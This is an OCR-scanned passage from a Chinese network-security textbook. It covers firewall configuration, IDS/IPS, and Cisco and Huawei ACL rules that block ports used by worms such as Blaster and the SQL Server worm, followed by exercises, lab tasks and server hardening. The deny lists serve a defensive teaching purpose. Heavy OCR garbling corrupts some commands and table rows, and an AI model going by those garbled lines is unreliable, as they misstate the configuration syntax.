式 , 将 新 的 规则 集 粘贴 到 命令 行 , 此 时 就 会 依次 执行 定义 规则 的 命令 ,从 而 实现 新 规则 集 的 
重新 定义 添加 。 

© 进入 交换 机 配置 模式 ,在 接口 上 重新 定义 规则 集 ,最 后 保存 交换 机 的 配置 。 

firewall(config) # interface GigabitEthernet0/1 


firewall(config - if) # ip access- group 102 in 


! 退 回 到 特权 模式 ,保存 配置 
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firewall(config - if) # end 

firewall # write 

! 退 出 特权 模式 

firewall exit 

firewall> 

在 进行 实 训 操 作 时 ,建议 使 用 真实 的 三 层 交 换 机 进行 实 训 。 若 没有 三 层 交 换 机 可 用 ,可 
使 用 Cisco Packet Tracer 5. x 模拟 器 来 进行 实 训 。 

在 Cisco Packet Tracer 5. x 模拟 器 中 配置 ACL 过 滤 规 则 时 ,要 注意 以 下 问题 。 

在 配置 类 似 “access-list 103 permit tep any eq 80 any” 这 类 规则 时 ,模拟 器 会 认为 是 未 
完成 的 命令 ,还 要 求 对 目标 主机 指定 端口 。 为 此 ,在 模拟 器 中 ,以 上 配置 命令 可 表达 为 以 下 
命令 格式 : 


access - list 103 permit tcp any eq 80 any range 1024 65535 


3.2.6 利用 Linux 系统 配置 实现 防火 墙 功 能 


Linux 系统 具有 强大 的 网 络 服务 功能 ,利用 Linux 内 核 提供 的 Netfilter (Network 
packet filtering) 通 用 框架 所 实现 的 报 文 过 滤 子 系统 ,可 实现 IP 报 文 过 滤 / 转 发 和 网 络 地 址 
转换 (NAT) 功 能 。 因 此 ,利用 PC 十 Linux 系统 ,可 实现 路 由 器 防火墙、 代理 服务 器 以 及 各 
种 应 用 服务 器 (Web 服务 .FTP 服务 .DNS 服务 .DHCP 服务 等 ) 的 功能 。 

利用 Linux 配置 成 防火 墙 , 需 要 掌握 Linux 的 相关 操作 命令 ,并 对 Linux 内 核 报 文 过 滤 
子 系统 对 报 文 的 过 滤 和 转发 处 理 流程 有 清晰 的 认识 ,需要 学 习 和 掌握 的 知识 较 多 ,因此 ,本 
教材 不 再 详细 介绍 , 感 兴趣 的 读者 可 参阅 冯 吴 编写 的 (Linux 服务 器 配置 与 管理 )( 第 2 版) 
(清华 大 学 出 版 社 )。 


3.3 入 侵 检 测 系 统 与 防御 系统 


防火 墙 \ 入 侵 检 测 系统 和 入 侵 防 御 系 统 均 属于 网 络 安全 设备 。 入 侵 检测 系统 和 入 侵 防 
御 系 统 属于 主动 安全 设备 ,入 侵 防御 系统 是 入 侵 检测 系统 的 新 一 代 产品 。 

1. 入 侵 检 测 系 统 简介 

人 侵 检 测 系统 (Intrusion Detection System,IDS) 是 一 种 对 网 络 传输 进行 实时 监控 , 实 
时 收集 和 分 析 网 络 事件 ,从 中 发 现 网 络 传输 中 是 否 存在 违反 安全 策略 的 行为 或 被 攻击 的 迹 
象 , 从 而 发 出 警报 或 者 采取 主动 反 制 措施 的 网 络 安全 设备 。 

进行 人 侵 检 测 的 软件 与 硬件 的 组 合 便 是 入 侵 检测 系统 。 入 侵 检测 系统 是 一 种 智能 化 的 
设备 ,属于 主动 防御 ,防火 墙 属于 被 动 防御 ,入 侵 检测 系统 可 与 防火 墙 配合 工作 ,通过 防火 墙 
来 切断 或 阻止 有 害 的 连接 。 

入 侵 检测 系统 主要 侧重 于 入 侵 检 测 和 报警 ,对 网 络 攻击 的 切断 和 反 制 ,要 借助 与 外 部 的 
防火 墙 设备 联动 来 实现 ,目前 ,入 侵 检测 系统 已 被 新 一 代 的 入侵 防御 系统 所 取代 。 

2. 入 侵 防御 系统 

入 侵 防 御 系 统 (Intrusion Prevention System.IPS) 集 成 了 入 侵 检测 与 防御 、 病 毒 过 滤 、 
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带宽 管理 和 URL 过 滤 等 功能 。 通 过 深入 到 7 层 的 分 析 与 检测 ,能 实时 阻 断 网 络 流量 中 隐 
藏 的 病毒 .蠕虫 .木马 ,间谍 软件 .DDoS 等 的 攻击 和 恶意 行为 ,并 对 分 布 在 网 络 中 的 各 种 
P2P、IM 等 非 关键 业务 进行 有 效 管理 ,实现 对 网 络 应 用 、 网 络 基础 设施 和 网 络 性 能 的 全 面 
保护 。 

目前 ,生产 网 络 设备 的 主流 厂商 也 都 推出 各 自 的 IPS 系统 。 如 华 三 的 SecPath T1000 £ 
列 、SecPath T5000-S3 和 SecBlade IPS 板 卡 。SecBlade 
IPS 板 卡 是 一 款 高 性 能 的 人 侵 防御 模块 ,可 应 用 于 
H3C S5800/S7500E/S9500E/S12500 系列 交换 机 和 
SR6600/SR8800 路 由 器 ,集成 人 侵 防御 /检测 、 病 毒 过 
滤 和 带宽 管理 等 功能 。 通 过 增 配 SecBlade IPS 板 卡 ， 
可 使 核心 交换 机 或 出 口 路 由 器 兼 具 和 人 侵 防御 系统 的 
功能 。 图 3.21 H3C SecPath T5000-S3 

H3C SecPath T5000-S3 入 侵 防 御 系 统 产品 外 观 入 侵 防御 系统 
如 图 3.21 所 示 。 


3.4 在 汇聚 层 交 换 机 配置 报 文 过 焉 


为 进一步 加 强 和 保障 局 域 网 通信 子 网 的 安全 传输 ,除了 在 网 络 边界 和 核心 交换 机 上 应 
用 防火 墙 技术 ,对 有 危害 的 报 文 进行 过 滤 外 ,通常 还 应 在 各 幢 楼 宇 的 汇聚 层 交 换 机 上 配置 
ACL 过 滤 规 则 , 阻 断 病毒 和 网 络 攻击 的 传播 。 


3.4.1 配置 策略 


在 汇聚 层 交 换 机 上 配置 ACL 过 滤 规 则 ,通常 要 封禁 病毒 传播 常用 的 一 些 端口 ,防范 和 
阻止 病毒 在 局 域 网 内 部 的 传播 。 对 于 已 发 生 的 网 络 攻 击 行为 ,可 利用 Sniffer 捕 包 分 析 软 
件 , 捕 包 并 找 出 攻击 报 文 的 特点 ,然后 配置 ACL 规则 ,将 这 类 报 文 丢弃 , 即 可 阻隔 攻击 报 文 
的 传播 。 

在 汇聚 层 交 换 机 上 ,其 ACL 过 滤 规 则 的 配置 策略 可 采取 默认 允许 的 策略 。 列 出 要 丢 
弃 的 报 文 的 匹配 规则 ,对 于 与 所 有 匹配 规则 都 不 匹配 的 报 文 , 则 默认 允许 通过 。 

比较 有 影响 的 几 款 病毒 传播 所 使 用 的 端口 如 表 3. 1 所 示 。 在 汇聚 层 交 换 机 上 ,通常 应 
禁止 对 这 些 端口 的 访问 ,以 阻隔 这 类 病毒 的 传播 。 


表 3.1 常见 病毒 传播 所 使 用 的 端口 


病毒 名称 使 用 的 TCP 端口 使 用 的 UDP 端口 
Blaster 蠕虫 病毒 4444 69 
冲击 波 病 毒 135—139.445.593 135—139.445.593 
PR A Wk i EE 445 ,5554,9995,9996 
SQL Server 蠕虫 病毒 1434 1434 
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3.4.2 思科 交换 机 ACL 配置 方法 


下 面 以 Cisco 交换 机 为 例 , 介 绍 ACL 过 滤 规 则 的 配置 方法 。 
1. 定义 ACL 过 滤 规 则 
进入 交换 机 配置 模式 ,依次 输入 和 执行 以 下 配置 命令 ,定义 ACL 过 滤 规则 。 


access - list 101 deny tcp any any eq 4444 
access - list 101 deny udp any any eq 69 

access - list 101 deny tcp any any range 135 139 
access - list 101 deny udp any any range 135 139 
access - list 101 deny tcp any any eq 445 

access - list 101 deny udp any any eq 445 

access - list 101 deny tcp any any eq 593 

access - list 101 deny udp any any eq 593 

access - list 101 deny tcp any any eq 5554 
access - list 101 deny tcp any any range 9995 9996 
access - list 101 deny tcp any any eq 1434 
access - list 101 deny udp any any eq 1434 
access - list 101 permit ip any any 


2. 将 ACL 规则 应 用 到 端口 并 保存 配置 
汇聚 层 交 换 机 的 各 端口 ,一 般 用 于 连接 接 和 人 层 的 二 层 交换 机 ,因此 ,应 在 各 端口 上 都 应 


用 该 规则 ,以 实现 在 各 端口 流入 的 方向 上 对 报 文 进 行 过 滤 处 理 。 


对 规则 的 应 用 ,在 交换 机 的 配置 模式 下 ,应 先 选择 要 配置 的 端口 ,然后 使 用 "ip access- 


group 101 in 配置 命令 ,应 用 该 规则 。 由 于 要 应 用 规则 的 端口 较 多 ,对 于 支持 端口 范围 选择 
的 交换 机 ,可 一 次 性 选择 多 个 连续 的 端口 ,然后 再 应 用 该 过 滤 规 则 。 配 置 方法 如 下 所 示 : 


Switch# config t 

Switch(config) # interface range fa0/1 - 24 
Switch(config - if ~ range) # ip access - group 101 in 
Switch(config— if - range) # end 

Switch# write 

Switch# exit 

Switch> 


3.4.3 华为 或 华 三 交换 机 ACL 配置 方法 


华为 或 华 三 交换 机 ACL 过 滤 规 则 的 配置 思路 和 方法 与 Cisco 交换 机 基本 相同 , 仅 是 配 


团 指 令 有 所 不 同 。 


1. 定义 ACL 过 滤 规 则 
在 华为 或 华 三 交换 机 的 系统 视图 模式 (system-view) 下 ,依次 执行 以 下 配置 命令 ,定义 


ACL 过 滤 规 则 。 
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acl number 3001 

rule deny tcp destination - port eq 4444 

rule deny udp destination - port eq 69 

rule deny tcp destination - port range 135 139 
rule deny udp destination - port range 135 139 


rule deny tcp destination - port eq 445 

rule deny udp destination - port eq 445 

rule deny tcp destination - port eq 593 

rule deny udp destination - port eq 593 

rule deny tcp destination - port eq 5554 

rule deny tcp destination - port range 9995 9996 
rule deny tcp destination - port eq 1434 

rule deny udp destination - port eq 1434 

rule permit ip source any destination any 


2. 将 ACL 规则 应 用 到 端口 并 保存 配置 
假如 要 将 ACL 过 滤 规 则 应 用 到 E0/1 至 E0/24 号 端口 , 则 配置 命令 为 : 


packet - filter inbound ip - group 3001 interface Ethernet 0/1 to Ethernet 0/24 


若 将 规则 仅 应 用 到 某 一 个 端口 ,比如 Ethernet 0/1 端口 , 则 配置 方法 如 下 所 示 : 


interface Ethernet 0/1 
packet - filter inbound ip - group 3001 


过 滤 规 则 应 用 好 后 ,最 后 执行 quit 命令 退出 系统 视图 模式 ,然后 执行 save 命令 保存 


习 题 3 
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.以 下 关于 网 络 安全 的 描述 ,不 正确 的 是 ( 3 
A. 计算 机 网 络 的 安全 分 为 通信 子 网 的 安全 和 资源 子 网 的 安全 两 方面 
B. 应 用 服务 器 的 安全 属于 资源 子 网 安全 范畴 
C. 用 户主 机 系统 的 安全 属于 通信 子 网 的 安全 范畴 
D. 目前 对 通信 子 网 的 安全 ,主要 通过 防火 墙 技术 来 解决 
2. 以 下 设备 或 系统 中 ,不 能 用 作 防 火 墙 设 备 使 用 的 是 ( ys 
A. 二 层 交 换 机 B. 三 层 交 换 机 C. 路 由 器 D. PC 十 Linux 系统 
3. 基于 纯 硬 件 的 防火 墙 设备 ,通常 都 具有 的 功能 是 ( Ys 
A. NAT B. IP 报 文 过 滤 C. 路 由 D. VPN 
4. 以 下 关于 防火 墙 的 描述 ,不 正确 的 是 ( ) 。 
A. 对 于 三 层 设备 .只 要 支持 IP 报 文 过 滤 功能 , 均 可 用 作 防 火 墙 来 使 用 
B. 利用 PC 机 ,通过 安装 和 配置 Linux 系统 ,该 台 PC 可 用 作 防 火 墙 来 使 用 
C. 防火 墙 属于 三 层 设备 
D. 防火 墙 属于 主动 安全 防御 设备 
5. 防火墙 设备 上 常见 的 网 络 接口 有 ( 
A. DMZ B. WAN C. LAN D. IDS 
6. 以 下 对 防火 墙 配置 的 描述 ,不 正确 的 是 ( Ja 
A. 防火 墙 一 般 都 提供 了 Web 页 面 配置 方式 ,但 不 一 定 会 提供 命令 行 配 置 方式 
B. 出 于 安全 考虑 ,防火 墙 一 般 采 用 安全 的 Web 服务 来 提供 其 配置 页 面 
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C. 不 同 厂商 生产 的 防火 墙 .其 Web 服务 默认 所 使 用 的 端口 不 一 定 相同 
D. 所 有 的 防火 墙 产品 都 同时 提供 了 Web 配置 方式 和 命令 行 配置 方式 
7. 在 一 个 局 域 网 络 中 ,假设 防火 墙 是 整个 网 络 的 边界 设备 ,对 外 与 因特网 互联 ,对 内 直 
接 与 核心 交换 机 互联 。 在 对 防火 墙 进行 配置 时 ,( ) 项 目 是 必须 要 配置 的 。 
A. 配置 防火 墙 各 网 络 接口 的 IP 地址 B. 配置 路 由 
C. 配置 安全 规则 D. MÆ NAT 
8. 以 下 对 防火 墙 过 虑 规则 配置 策略 的 描述 ,不 正确 的 是 (  )。 
A. 根据 应 用 的 需要 ,配置 策略 可 采用 默认 允许 或 默认 禁止 的 策略 
B. 在 网 络 接口 上 应 用 规则 时 ,可 以 在 in 方向 ,也 可 以 在 out 方向 上 应 用 规则 ,实现 
对 不 同方 向 来 的 报 文 进行 过 滤 
C. 在 同一 个 网 络 接口 上 ,不 能 同时 对 in 和 out 两 个 方向 上 进行 报 文 过 滤 
D. 对 规则 配置 策略 选择 的 基本 原则 是 使 所 配置 表达 的 规则 尽 可 能 的 少 
9. 以 下 关于 提升 和 保障 网 络 安全 的 做 法 中 ,不 正确 或 无 助 于 提升 安全 性 的 是 ( a 
A. 在 网 络 边 界 应 用 防火 墙 设备 ,保护 局 域 网 中 各 应 用 服务 器 的 安全 
B. 在 局 域 网 的 各 二 层 交 换 机 中 ,配置 ACL 过 滤 规 则 ,阻隔 病毒 或 网 络 攻 击 的 传播 
C. 在 局 域 网 的 各 汇聚 层 交 换 机 中 ,配置 ACL 过 滤 规 则 ,阻隔 病毒 或 网 络 攻击 的 
传播 
D. 在 用 户主 机 安装 软件 版 防火 墙 和 360 安全 卫士 
10. 对 于 通信 子 网 的 安全 ,可 从 ( ) 方 面 来 保障 和 提升 其 安全 性 。 
A. 在 网 络 边界 应 用 防火 墙 设备 
B. 在 网 络 内 部 的 各 三 层 设备 节点 ,配置 ACL 过 滤 规 则 ,阻隔 病毒 和 网 络 攻击 的 
传播 
C. 在 核心 交换 机 上 配置 IPS 板 卡 ,实现 网 络 安全 的 主动 检测 与 防御 
D. 在 接 入 层 上 配置 启用 ACL 过 滤 规 则 ,阻隔 来 自用 户主 机 的 病毒 和 网 络 攻 击 的 
传播 


实 训 3.1 安装 配置 基于 硬件 的 防火 墙 


【 实 训 目的 】 熟悉 和 掌握 基于 硬件 的 防火 墙 的 配置 方法 。 

【 实 训 环境 与 设备 】 

1. 实 训 环境 

实 训 网 络 拓扑 如 图 3. 22 所 示 。 

2. 实 训 设备 

基于 硬件 的 防火 墙 设备 一 台 ,PC 三 台 , 三 层 交 换 机 一 台 ( 可 选 )。 三 层 交 换 机 用 于 模拟 
局 域 网 的 核心 交换 机 。 若 无 三 层 交 换 机 , 则 将 防火 墙 的 L.A N 接口 地 址 配置 成 内 网 的 网 关 
地 址 。 

【 实 训 内 容 】 

(1) 配置 防火 墙 ,保证 内 网 用 户 能 通过 防火 墙 的 NAT 功能 访问 因特网 。 
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图 3.22 实 训 网 络 拓扑 结构 


(2) 配置 防火 墙 的 安全 规则 ,只 允许 因特网 用 户 和 内 网 用 户 访问 DMZ 区 服务 器 的 标准 
服务 (Web 服务 FTP 服务 .邮件 服务 .DNS 服务 ), 人 允许 ping DMZ 区 各 服务 器 。 内 网 用 户 
允许 访问 DMZ 区 各 服务 器 的 SSH 服务 。 

【 实 训 步 骤 】 

(1) 查阅 防火 墙 的 使 用 手册 ,找到 防火 墙 LAN 口 出 厂 设 置 的 IP 地址 ,以 及 Web 服务 
的 协议 类 型 (http:// 或 https://) 和 端口 号 。 

(2) 将 一 台 PC 直接 连 到 防火 墙 的 LAN 口 ,并 将 PC 的 IP 地 址 设置 为 与 防火 墙 LAN 
口 地 址 在 同一 个 网 段 的 某 个 IP 地 址 ,然后 在 PC 上 利用 I 下 浏览 器 访问 防火 墙 的 Web 配置 
页 面 。 登 录 配 置 页 面 成 功 后 ,将 LAN 口 地 址 更 改 为 实 训 拓扑 图 中 规划 的 IP 地 址 。 

(3) 配置 核心 交换 机 的 互联 接口 地 址 ,保证 核心 交换 机 与 防火 墙 的 互联 互通 。 在 核心 
交换 机 上 创建 一 个 VLAN, 并 配置 VLAN 接口 地 址 (该 地 址 将 成 为 用 户主 机 的 网 关 地 址 ) 。 
然后 将 测试 机 PCO 所 连接 的 交换 机 端口 ,划分 到 该 VLAN 中 。 

配置 PCO 主机 的 IP 地 址 、 子 网 掩 码 和 网 关 地 址 ,然后 ping 其 网 关 地 址 ,检查 到 网 关 的 
网 路 是 否 通畅 。 然 后 再 ping 172. 16. 1. 1 这 个 防火 墙 的 内 网 接口 地 址 ,检查 是 否 通 畅 。 

(4) 在 PCO 主机 上 ,利用 IE 浏览 器 ,通过 访问 172. 16. 1. 1 这 个 地 址 ,重新 访问 登录 防 
火 墙 的 配置 页 面 , 开 始 对 防火 墙 的 正式 配置 。 

O 根据 图 3. 22 对 IP 地 址 的 规划 ,分 别 配置 WAN 和 DMZ 接口 的 IP 地 址 。 

@ 将 100. 100. 100. 4/30 定义 成 NAT 地 址 池 ,配置 防火 墙 的 NAT 转换 功能 ,保证 内 
网 用 户 能 正常 访问 因特网 。 

@ 配置 防火 墙 的 静态 路 由 。 

@ 在 PC0 主机 上 测试 检查 能 和 否 通过 防火 墙 的 代理 ,正常 访问 100. 100. 100. 1 主机 的 
Web 服务 。 若 能 正常 访问 ,然后 再 进一步 检查 访问 请 求 报 文 的 源 地 址 是 否 是 NA T 地 址 池 
中 的 地 址 ,若是 , 则 防火 墙 的 NAT 配置 成 功 。 
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检查 方法 : 利用 记事 本 创建 一 个 名 为 getip. asp 的 文件 ,其 内 容 如 下 : 


<% Response. write "IP 地 址 为 : " & Request. ServerVariables("REMOTE ADDR") %> 


然后 将 getip. asp 文件 上 传 到 100. 100. 100. 1 服务 器 的 站 点 根 目 录 下 。 在 PC0 主机 上 
访问 “http://100. 100. 100. 1 /getip. asp?” 地 址 , 即 可 查看 到 PCO 主机 的 访问 请 求 报 文 的 源 
IP 地 址 。 

@ 防火 墙 的 NAT 功能 正常 后 再 配置 实现 报 文 过 滤 的 安全 规则 。 

@ 保存 配置 。 


实 训 3.2 利用 三 层 交 换 机 配置 实现 防火 墙 功能 


【 实 训 目 的 】 掌握 利用 三 层 交 换 机 配置 防火 墙 的 配置 方法 以 及 后 期 的 维护 管理 方法 。 

【 实 训 环境 与 设备 】 

1. 实 训 环境 

按照 图 3. 20 构建 实 训 网 络 环境 。 

2. 实 训 设备 

本 实 训 环境 所 要 求 的 设备 较 多 , 若 缺 乏 相 应 的 实 训 设备 ,可 在 Cisco Packet Tracer 5. x 
模拟 器 中 构建 网 络 实 训 环境 进行 实 训 操作 。 

【 实 训 内 容 】 

按 3. 2. 5 小 节 所 讲 的 步骤 和 方法 ,将 三 层 交 换 机 配置 成 防火 墙 来 使 用 。 

为 了 进一步 验证 和 测试 防火 墙 配置 的 正确 性 ,需要 按 图 3. 20 所 示 的 网 络 地 址 规划 ,分 
别 配置 各 互联 设备 ,保证 这 些 设备 都 能 互联 互通 。 然 后 在 内 网 的 主机 (PC0 或 PC1) 上 ,通过 
访问 或 ping DMZ 区 中 的 服务 器 ,来 检测 防火 墙 配置 的 正确 性 。 


98 


第 4 章 网 络 服务 器 与 主机 的 安全 防范 


计算 机 网 络 的 安全 ,除了 保障 通信 子 网 的 安全 之 外 ,还 必须 对 资源 子 网 的 安全 进行 防范 
和 保障 。 网 络 服务 器 和 用 户主 机 属于 资源 子 网 ,本 章 主 要 介绍 网 络 应 用 服务 和 用 户主 机 系 
统 的 安全 保障 技术 。 


4.1 服务 器 硬件 配置 与 安全 


网 络 服务 器 由 服务 器 硬件 和 软件 系统 组 成 ,服务 器 的 安全 对 应 地 包含 这 两 方面 ,二 者 相 
辅 相 成 , 缺 一 不 可 。 本 节 主 要 介绍 服务 器 硬件 和 环境 因素 对 安全 的 影响 。 


4.1.1 物理 与 环境 安全 


为 保证 服务 的 可 用 性 、 稳 定性 和 连续 性 ,服务 器 都 是 不 间断 地 工作 。 这 对 服务 器 自身 硬 
件 的 可 靠 性 和 运行 环境 提出 了 更 高 的 要 求 。 

为 保障 服务 器 的 安全 ,稳定 运行 ,放置 服务 器 的 机 房 地 板 必须 是 防 静电 地 板 , 并 要 对 机 
房 的 温度 和 湿度 进行 严格 控制 。 


4.1.2 服务 器 硬件 配置 的 基本 要 求 


为 保证 服务 器 的 可 靠 性 和 稳定 性 .服务 器 不 能 使 用 高 性 能 的 PC 充当 ,必须 选择 专业 的 
服务 器 硬件 。 在 硬件 配置 方面 ,还 必须 配置 元 余 电源 和 磁盘 RAID (Redundant Array of 
Independent Disks) 阵 列 。 


4.1.3 服务 器 系统 安装 与 数据 安全 


1. 服务 器 操作 系统 安装 简介 

服务 器 与 普通 PC 的 一 个 最 大 的 区 别 是 服务 器 普遍 配置 有 RAID 阵列 卡 ,在 安装 操作 
系统 时 ,必须 首先 安装 阵列 卡 的 驱动 程序 ,否则 安装 程序 无 法 识别 硬盘 ,因此 ,对 服务 器 操作 
系统 的 安装 ,与 一 般 PC 的 安装 有 所 不 同 。 

服务 器 出 厂 时 配送 有 一 张 操作 系统 安装 引导 光盘 ,该 光盘 中 提供 了 服务 器 支持 的 所 有 
操作 系统 的 安装 向 导 和 服务 器 硬件 的 所 有 驱动 程序 。 

首先 将 光盘 插入 光驱 中 ,由 光驱 引导 并 自动 启动 服务 器 的 安装 向 导 , 然 后 根据 向 导 的 指 
引 ，, 完 成 相关 安装 的 设置 后 ,最 后 采用 无 人 值守 的 安装 方式 ,完成 对 操作 系统 的 安装 。 

安装 向 导 采 用 人 机 交互 方式 ,让 用 户 选择 要 安装 的 操作 系统 类 型 .要 创建 的 RAID 阵列 


类 型 (一 般 选 择 RAID 5) 要 安装 的 操作 系统 的 序列 号 、.C 盘 的 空间 大 小 和 分 区 格式 等 信息 。 
安装 向 导 在 获得 所 需 的 安装 信息 后 .就 会 自动 开始 创建 磁盘 RAID 阵列 ,格式 化 磁盘 分 区 ， 
然后 提示 用 户 插入 操作 系统 的 安装 光盘 ,之 后 就 进入 无 人 值守 的 操作 系统 安装 模式 ,直到 安 
装 完 毕 。 

值得 注意 的 是 ,服务 器 操作 系统 的 安装 分 区 和 数据 的 存储 分 区 ,一 定 要 采用 NTFS 格 
式 的 分 区 ,以 提升 数据 的 安全 性 。FAT32 分 区 无 法 进行 详细 的 权限 分 配 设置 。 

2. 服务 器 的 数据 安全 

为 保障 服务 器 的 数据 安全 ,在 物理 层面 ,就 要 求 服务 器 必须 配置 RAID 磁盘 阵列 ,以 对 
数据 提供 宛 余 备 份 。RAID 磁盘 阵列 最 常用 的 是 RAID 0.RAID 1 和 RAID 5 模式 。 

RAID 0 和 RAID 1 至 少 需 要 配备 两 块 同型 号 的 硬盘 。RAID 0 具有 所 有 RAID 级 别 中 
最 高 的 存储 性 能 ,其 原理 是 将 连续 的 数据 分 散 到 多 个 磁盘 上 并 行 存 取 , 这 样 就 显著 提高 了 磁 
盘整 体 的 存 取 速 度 和 存储 容量 。 由 于 数据 是 分 散 存储 在 多 块 硬盘 上 的 ,这 样 ,只 要 有 一 块 硬 
盘 物 理 损坏 , 则 数据 将 全 部 丢失 .因此 ,RAID 0 是 以 牺牲 数据 的 安全 性 来 换取 存 取 性 能 和 
存储 容量 的 。 

RAID 1 是 镜像 磁盘 阵列 ,其 工作 模式 是 将 用 户 写 人 硬盘 的 数据 ,同时 也 写 入 另 一 块 元 
余 备 份 的 硬盘 中 ,实现 对 存储 数据 的 百分之百 备份 。RAID 1 提供 了 最 高 的 数据 安全 保障 
但 存储 成 本 高 ,适合 于 存储 重要 的 数据 资料 。 

RAID 5 至 少 需要 3 块 同型 号 的 硬盘 ,其 中 一 块 用 于 数据 的 元 余 备 份 ,因此 ,对 于 RAID 5 
磁盘 阵列 ,只 允许 物理 损坏 一 块 硬盘 。 用 新 硬盘 替换 损坏 的 硬盘 后 ,磁盘 阵列 会 自 建 恢 复 该 
硬盘 的 数据 。RAID 5 兼顾 了 数据 的 安全 性 和 性 能 ( 存 取 速度 和 存储 空间 方面 ) ,在 服务 器 
中 使 用 较 多 。 

为 保障 服务 器 工作 的 连续 性 ,服务 器 硬盘 必须 支持 热 拔 插 。 目 前 ,服务 器 硬盘 可 选用 
SAS 或 SATA 接口 的 硬盘 。SAS 接口 是 早期 的 SCSI 接口 的 新 一 代 , 存 取 访 问 速度 比 
SATA 快 。 在 硬盘 转速 方面 ,SAS 硬盘 可 选择 15krpm(15000 转 ) 或 10krpm(10000 转 ) 的 
转速 。 转 速 大 的 硬盘 , 存 取 访问 速度 更 快 。 

因此 ,为 保障 服务 器 数据 的 安全 ,服务 器 在 硬件 配置 方面 必须 配置 RAID 磁盘 阵列 ,并 
将 磁盘 配置 成 RAID 1 或 RAID 5 工作 模式 ,并 配置 元 余 电源 。 


4.2 服务 器 面临 的 主要 安全 威胁 


由 于 服务 器 是 网 络 资源 的 提供 者 ,很 容易 受到 来 自 网 络 各 方面 的 攻击 与 人 侵 。 除 通信 
子 网 之 外 ,服务 器 是 网 络 安全 的 另 一 个 重点 防御 和 保护 对 象 。 

服务 器 面临 的 安全 威胁 主要 体现 在 以 下 方面 。 

(1) 服务 器 操作 系统 和 应 用 服务 软件 自身 的 漏洞 所 带 来 的 安全 威胁 。 

(2) 计算 机 蠕虫 病毒 与 木马 的 攻击 与 人 侵 带 来 的 安全 威胁 。 

(3) 黑客 的 攻击 与 人 侵 带 来 的 安全 威胁 。 

(4) 服务 器 安全 配置 和 管理 不 到 位 、 安 全 防范 意识 薄弱 和 人 为 操作 失误 带 来 的 安全 
威胁 。 
100 


(5) 服务 器 的 运行 环境 所 带 来 的 安全 威胁 。 


43 保护 服务 器 安全 常用 的 措施 


4.3.1 打 补 丁 修复 系统 漏洞 


服务 器 操作 系统 和 应 用 服务 软件 自身 的 漏洞 ,给 服务 器 的 安全 带 来 了 严重 的 安全 威胁 。 
很 多 蠕虫 病毒 或 木马 程序 ,以 及 黑客 的 攻击 ,往往 都 利用 操作 系统 或 应 用 服务 器 软件 某 方面 
的 漏洞 来 实施 和 实现 攻击 与 人 侵 ,因此 ,对 于 已 公布 的 和 系统 存在 的 漏洞 ,作为 服务 器 管理 
员 ,要 及 时 给 系统 打 补 丁 , 以 修复 这 方面 的 漏洞 。 

360 安全 卫士 提供 了 操作 系统 和 应 用 软件 漏洞 的 自动 检测 、 自 动 下 载 补丁 和 自动 安装 
补丁 的 功能 ,因此 ,对 于 网 络 服务 器 ,应 安装 360 安全 卫士 对 系统 提供 安全 保护 ,同时 利用 
360 安全 卫士 ,及 时 给 系统 打 补丁 。 


4.3.2 安装 反 病 毒 和 防火 墙 软件 


为 防止 病毒 和 木马 对 服务 器 安全 带 来 威胁 ,服务 器 通常 还 应 安装 杀 病 毒 软 件 .360 安全 
卫士 和 防火 墙 软件 。 

对 于 杀 病 毒 软件 和 360 安全 卫士 ,要 做 到 及 时 更 新 病毒 特征 库 和 木马 特征 库 , 并 每 隔 一 
段 时 间 对 操作 系统 进行 一 次 病毒 或 木马 查 杀 。 

对 于 SQL Server、Oracle 等 数据 库 服务 器 ,建议 在 服务 器 正常 运行 期 间 , 停 止 反 病毒 的 
实时 监控 引擎 。 由 于 杀 病 毒 软件 会 实时 扫描 检查 磁盘 存 取 的 内 容 ,这 会 严重 影响 数据 库 服 
务 器 的 磁盘 存 取 性 能 。 

防火 墙 软件 主要 用 于 防范 黑客 或 木马 病毒 的 攻击 与 人 侵 。 可 选用 瑞星 防火 墙 软件 或 天 
网 防火 墙 软件 。 另 外 ,也 可 通过 配置 使 用 本 
Windows 操作 系统 自 带 的 TCP/IP 筛选 功能 ， mlns |ms Wm | 
来 实现 简易 防火 墙 的 功能 。 mene O: 

下 面 对 开 启 和 使 用 TCP/IP 筛选 功能 , 实 
现 简 易 防火 墙 功 能 的 配置 方法 作 简 要 介绍 。 

(1) 首先 打开 “网 络 连接 ”, 右 击 网 卡 的 “本 
地 连接 ”选项 ,在 弹出 的 菜单 中 选择 “属性 ” 选 
项 ,打开 网 卡 的 属性 对 话 框 。 

(2) 在 网 卡 属性 对 话 框 的 网 卡 协议 列表 框 
中 选择 “Internet 协议 (TCP/IP)” 选 项 ,然后 单 
击 “ 属 性 ”按钮 .打开 “Internet 协议 (TCP/IP) 
属性 ”对 话 框 ,在 该 对 话 框 中 单 击 “ 高 级 ”按钮 ， 
此 时 将 打开 “高 级 TCP/IP 设置 ?对 话 框 ,在 该 
对 话 框 中 选择 “选项 ”选项 卡 ,这 时 就 可 看 到 
TCP/IP 筛选 设置 框 ,如 图 4. 1 所 示 。 


图 4.1 TCP/IP iik 


(3) 在 如 图 4.1 所 示 的 界面 中 , 单 击 * 属 性 ”按钮 ,打开 *TCP/IP 筛选 ?设置 对 话 框 , 如 
图 4.2 所 示 。 

(4) 在 如 图 4.2 所 示 的 设置 界面 中 ,选中 “只 允许 ” 单 选 按 钮 ,然后 单 击 “ 添 加 ”按钮 即 可 
添加 允许 访问 的 TCP 或 UDP 端口 。 选 中 “只 允许 ” 单 选 按钮 后 , 若 不 添加 任何 端口 , 则 相应 
的 不 允许 访问 该 协议 的 任何 端口 。 

对 于 Web 服务 器 ,为 便于 上 传 网 页 ,同时 也 安装 和 开启 了 FTP 服务 ,为 提高 Web 服务 器 
的 安全 性 ,通过 TCP/IP 筛选 功能 ,可 配置 成 只 允许 用 户 访问 Web 服务 器 的 TCP 80、TCP 20 
# TCP 21 端口 ,其 余 端 口 一 律 不 允许 访问 。 此 时 的 TCP/IP 筛选 配置 界面 如 图 4.3 所 示 。 


aixi EE] 
r BR TEA WEND] M BA TCP/IP Bi REED V 
他 全 部 区 许 外 ) 他 全 部 允许 如 C BFD 个 全 部 允许 加 ) 个 全 部 允许 册 个 全 部 允许 0) 
C 只 训话 四 C Riera C RRF C RFD C Rita C 只 允许 
二 而 
BEW 


图 4.2 TCP/IP 筛选 设置 图 4.3 Web 服务 器 的 TCP/IP 筛选 设置 


(5) TCP/IP 筛选 设置 好 后 , 单 击 “ 确 定 " 按 钮 。 最 后 系统 会 弹出 “要 使 新 设置 生效 ,必须 
